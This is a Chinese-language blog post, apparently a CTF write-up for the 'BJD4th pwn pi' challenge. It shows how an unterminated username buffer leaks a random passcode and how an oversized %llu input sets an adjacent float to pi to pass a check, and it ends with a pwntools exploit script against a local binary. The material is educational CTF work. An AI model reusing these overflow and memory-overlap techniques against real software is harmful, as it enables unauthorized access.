BJD4th pwn pi

  没记错的话,比赛那天正好是圣诞节,就只看了这一道pwn题,我还没做出来。我太菜了。

  有一说一,ida换成7.5版本之后,一些去掉符号表的函数也能被识别出来了,ida更好用了呢。

  题目程序分为两块,先看第一块,登陆。

  先输入一个username,再输入一个passcode,程序会判断passcode和在16行随机生成的数是否相等,如果相等就会通过判断。(16行,后面的函数是来读取随机数的)

  这里的读取用的是自写函数,sub_13BB,跟进去看看。

  箭头所指是会在我们输入的username后面加"\x00"的,用来截断字符串,但是这里明显可以溢出。

  当输入64个字符时,会在65处加上"\x00",执行snprintf的时候,这个位置又会被随机数覆盖,在18行进行输出的时候,由于没有截断,会把生成的随机数也输出。这样就得到passcode了。这样第一部分就搞定了。接下来看第二部分。

  这里题目说了,程序用的是蒙特卡罗算法求圆周率的。到底是怎么求的呢?

  个人感觉和抛硬币一样,只要你抛得次数足够多,最后的统计出的抛出正面和反面的概率就越接近1/2。这就是这个算法的核心,多次随机实验来求概率,通过概率再进行推算。跑远了...

  题目是让最后得出的圆周率的误差小于0.0000001就可以cat flag。是让我们输入一个实验的次数,理论上,只要次数足够多,就可以直接拿flag。但是程序在第一块有alarm函数,是有计时的。所以不行,毕竟还是个pwn题嘛,找找漏洞点。

  这里有一个17行有一个"%llu"其实挺引人注目的,这个是long long int的缩写,而程序上写了,v1是int类型变量,说明这里可以进行溢出。可以将v2赋值成3.1415926,同时让v1==0,这样v0==0,就可以拿到flag了。

  这里有一个知识点就是,浮点数应在内存中应该怎么表示呢?我以前写过文章专门讲解过,这里我就直接通过例子看了。

1 #include<stdio.h>
2 float a;
3 int main()
4 {
5     a=3.1415926;
6     getchar();
7     return 0;
8 }

  gcc编译一下,看内存分布。

  因为这只是给v2赋值的,还需要让v1==0,因为是小端序的原因,内存中应该是

  00000000 DA0F4940 00000000 (前面的8个数代表v1的内存分布,后面的16个数是v2的内存分布)

  所以这里需要输入的数值应该是‭4632251120704552960‬,既能让v1==0,又能让v2==3.1415926。这样就能拿到flag了。

  exp:

 1 from pwn import *
 2 
 3 p = process('./pi')
 4 context.log_level = 'debug'
 5 
 6 p.sendlineafter('Username: ','a'*0x3f+'b')
 7 p.recvuntil('b')
 8 password = p.recvuntil('.')[:-1]
 9 print 'password-->'+password
10 p.sendlineafter('Passcode: ',password)
11 p.recvuntil('N = ')
12 p.sendline('4632251120704552960')
13 p.recv()
14 p.close()

 

蒙特卡洛算法图片来源:https://crazism.net/9454.html

posted @ 2021-01-04 23:22  不会修电脑  阅读(118)  评论(0编辑  收藏  举报